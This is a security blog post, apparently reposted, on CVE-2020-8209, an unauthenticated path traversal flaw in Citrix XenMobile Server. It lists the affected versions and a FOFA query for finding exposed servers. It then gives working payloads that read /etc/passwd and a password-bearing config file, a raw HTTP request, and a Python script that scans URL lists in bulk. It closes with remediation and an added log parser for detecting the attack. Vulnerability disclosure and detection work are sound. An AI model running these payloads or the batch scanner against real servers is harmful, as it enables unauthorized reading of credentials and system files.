CVE-2020-8209 (Citrix Endpoint Management) XenMobile-Console arbitrary file read vulnerability


0x00 Preface

XenMobile is an enterprise mobility management product developed by Citrix. It lets companies manage employees' mobile devices and mobile applications, so that staff can work securely on both enterprise-owned and personal devices and applications. CVE-2020-8209 is a path traversal vulnerability in this product: it allows unauthenticated users to read arbitrary files from the server, including configuration files that contain passwords. (The software is deployed mostly outside China and rarely within it.)

Citrix XenMobile Server 10.12 before RP2, 10.11 before RP4, 10.10 before RP6 and 10.9 before RP5 have improper access control, which results in the ability to read arbitrary files.

0x01 Affected versions

  • XenMobile Server 10.12 before RP2
  • XenMobile Server 10.11 before RP4
  • XenMobile Server 10.10 before RP6
  • XenMobile Server 10.9 before RP5

0x02 FOFA query

app="XenMobile-Console"

0x03 Vulnerability reproduction

POC:

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

Raw request POC:

GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://fofa.so/result?qbase64=YXBwPSJYZW5Nb2JpbGUt5o6n5Yi25Y%2BwIiAmJiBjb3VudHJ5PSJERSI%3D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

0x04 Batch script

#!/usr/bin/env python
# coding:utf-8

import sys
import requests
from colorama import init
init(autoreset=True)

# banner was referenced but never defined in the original script
banner = 'CVE-2020-8209 Citrix XenMobile path traversal batch checker'

def XenMobile(urls):
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
    payload = '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
    poc = urls + payload
    try:
        requests.packages.urllib3.disable_warnings()  # suppress InsecureRequestWarning caused by verify=False
        response = requests.get(poc, headers=headers, timeout=10, verify=False)
        # response.text (str) rather than response.content (bytes), so the check also works on Python 3
        if response.status_code == 200 and "root" in response.text:
            print(u'\033[1;31;40m[+]{} is vulnerable to the Citrix XenMobile directory traversal'.format(urls))
        else:
            print('[-]{} None'.format(urls))
    except requests.exceptions.RequestException:
        print(u'{} request timed out or failed'.format(urls))


if __name__ == '__main__':
    print(banner)
    if len(sys.argv) != 2:
        print('Example: python CVE-2020-8209-Multiple.py url.txt')
    else:
        with open(sys.argv[1]) as file:
            for url in file.readlines():
                urls = url.strip()
                if urls:
                    XenMobile(urls)
        print('Check Over')

0x05 Remediation

The official patch removes /opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp from the server. Apply the rolling patch level listed under 0x01 for your XenMobile Server version.
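For defenders who cannot patch immediately and want to know whether the traversal above was ever attempted, here is an added log-review example (not from the original post): it parses common-format access log lines, picks out requests to /jsp/help-sb-download.jsp, and flags any sbFileName value that escapes the download directory after URL decoding and normalisation. The base directory and the log lines are constructed placeholders, not values from the product.

```python
#!/usr/bin/env python3
"""Flag CVE-2020-8209 path-traversal attempts in web access logs."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed directory the JSP served files from (placeholder, not the real product path).
BASE_DIR = "/var/help-sb"

# Constructed sample log lines in common log format; not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2020:10:12:01 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 200 1842
203.0.113.5 - - [10/Nov/2020:10:12:03 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=..%2F..%2F..%2Fopt/sas/sw/config/sftu.properties HTTP/1.1" 200 512
198.51.100.7 - - [10/Nov/2020:10:13:10 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=user-guide.pdf HTTP/1.1" 200 90210
198.51.100.7 - - [10/Nov/2020:10:14:00 +0000] "GET /zdm/login_xdm_uc.jsp HTTP/1.1" 200 3001
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_traversal(value):
    """True if the (possibly URL-encoded) file name resolves outside BASE_DIR."""
    decoded = unquote(unquote(value)).replace("\\", "/")  # two rounds catch double encoding
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, decoded))  # absolute names replace BASE_DIR
    return not (resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/"))

def find_traversal_attempts(log_text):
    """Return (client ip, status, decoded sbFileName) for each suspicious help-sb-download.jsp request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/jsp/help-sb-download.jsp":
            continue
        # parse_qs percent-decodes once; is_traversal decodes again for double-encoded payloads
        for name in parse_qs(parts.query, keep_blank_values=True).get("sbFileName", []):
            if is_traversal(name):
                hits.append((m.group("ip"), int(m.group("status")), unquote(name)))
    return hits

if __name__ == "__main__":
    for ip, status, name in find_traversal_attempts(SAMPLE_LOG):
        print(f"[!] {ip} status={status} sbFileName={name}")
```

A status of 200 on a flagged line means the server actually served the file, which is the case that warrants credential rotation for anything stored in the configuration files listed above.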

Please credit the source when reposting: Adminxe's Blog  »  CVE-2020-8209 (Citrix Endpoint Management) XenMobile-Console arbitrary file read vulnerability


Source: blog.csdn.net/Adminxe/article/details/109778455